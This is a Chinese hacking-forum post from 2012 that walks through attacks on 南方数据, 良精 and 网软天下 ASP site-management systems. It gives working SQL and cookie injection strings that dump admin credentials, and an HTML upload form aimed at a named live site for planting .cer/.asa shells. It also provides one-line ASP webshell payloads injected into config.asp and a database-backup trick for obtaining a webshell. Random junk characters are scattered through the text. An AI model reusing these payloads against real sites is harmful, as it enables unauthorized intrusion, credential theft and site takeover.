找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2433|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb
5 Z- U1 D& e  i. x1 O1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 9 z! d6 J* i) E9 P% C
也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F77 E" ~( S0 m! @9 f! q& e% {" V
直接暴管理员帐号密码(md5)/ t& R2 X6 ?5 S3 n2 k9 A, B& O" X2 F
2.登陆后台& @8 b. y+ J# ]- u( C, E5 q
3.利用编辑器上传:
2 l8 H" C, _2 Z& u$ D/ ?- `. `+ t) U访问admin/southidceditor/admin_style.asp( k- `) L" L* F( F
修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.
# Z. z: X5 {" p6 D6 e9 F5 _* _
7 P" i! t% q' d* m$ U0 F========================================% I5 D$ n( D0 e' A5 W

- J" O( A9 `" N参考资料整理:- |- c. H- e$ `& G
南方数据、良精系统、网软天下漏洞利用
, T  o9 Y. J2 B6 @
9 U! M# e* i: e3 b1、通过upfile_other.asp漏洞文件直接取SHELL& D( M" q' k( O4 \
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:
/ L# o, J0 R! Q, w( J  _( O# j<HTML><HEAD>
' m! S3 w2 l! C- c$ A4 y8 O% M( q<META http-equiv=Content-Type content="text/html; charset=gb2312"> + m' \0 Y- O0 Q6 _  B; \
<STYLE type=text/css>BODY {
1 y/ v( g6 ~/ V8 V3 z$ a# u3 ~FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
* ?6 S0 f) r7 ^- n# H}
' y2 V$ g% I4 _7 ]4 l' z.tx1 {
. e9 ]) D4 N* LBORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
- }6 ]& `* A$ c  E} 3 j' W  ^: V) Q: S' h
</STYLE>" V# Q2 ^2 Y( r- N$ j
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
3 Z6 h: A; Z* `7 Y2 x) j$ B<BODY leftMargin=0 topMargin=0>   K5 i9 d- F/ f, |. F! L
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post ) G/ A: \( x- @) ~4 x1 n1 \
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit> 5 o' _9 I, K' l8 K
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
9 w2 l0 P; R1 O4 n5 Q8 U1 Y+ ~  W6 \9 e& m( m1 c; W
将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。' d# S) K' ?4 H. [4 t  b* H
注:此方法通杀南方数据、良精系统、网软天下等& l: k" w* [8 Q4 ^

9 U& i: U1 _3 d4 L% k" B( e0 b5 `2、通过注入秒杀管理员帐号密码,使用如下:
3 q/ A6 e0 F( C" `7 Phttp://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’1 R# r' b' V% M. U
以上代码直接暴管理员帐号和密码,取SHELL方法如下:. u8 e9 w- R$ x3 V* }
在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’
" r% |+ g8 O; N) W. S( `. S) j成功把shell写入http://www.target.com/inc/config.asp
8 D, f5 P1 b3 g# y2 D" Y' d9 W3 j这里一句话chr(32)密码是“#”
+ e9 H! |$ ^; J& ]. K3、cookie注入# g6 b5 {  W" h% N& s# D3 b
清空地址栏,利用union语句来注入,提交:
3 @6 c+ h7 G3 X' n) p* }javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
3 m) h$ m0 Y9 T' Z) F如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?
( e0 x) D' P* {6 b! o注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。
# m+ E& ~4 n$ q(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)
* z/ T) g8 [1 C( Y, @5 b2 Q& g) r, x: ^4 c0 c$ ^' l
三、后台取SHELL方法总结
; [0 Q- y  Y) [(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:
/ [; ~- R: T$ l) _4 [& w' g8 K然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,3 ], [  e2 p, g. B' T
这时再打开一句话马的客户端,提交同样得到一个小马
0 C" U+ V9 V& L6 J3 w(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)
% d" \( h: l+ _* L# q* R) b(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:- b+ Z' \# h% U7 s  r, M6 f# ]" j
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
' B* s! H3 K8 L5 k7 H2 Y, hEnableUpload=false
& ~1 p( P" k' y* b$ B! |( \" }- ]. i$ L
end if
) n! h& R* _/ ]' h( ?" Lif EnableUpload=false then
+ n& d4 R  w0 l  ], Jmsg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType% p& U4 m- f& b7 N7 m
FoundErr=true% G! O  Z  J$ k9 x- b- F
end if
' t! D$ e" s( g0 F  K  Q  P( c$ Z! Q大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:! E5 O, E! N$ x) Q  w
提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)( x2 C+ z1 D* k
(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的
) n; T3 {. K' g- N0 k
0 h9 r5 z! I* h; H点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的
5 `' @+ X5 |( N0 m+ B! y0 E) _直接访问备份后的地址,就得到一个webshell
' d8 }% G0 ~! I+ B  L% _(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表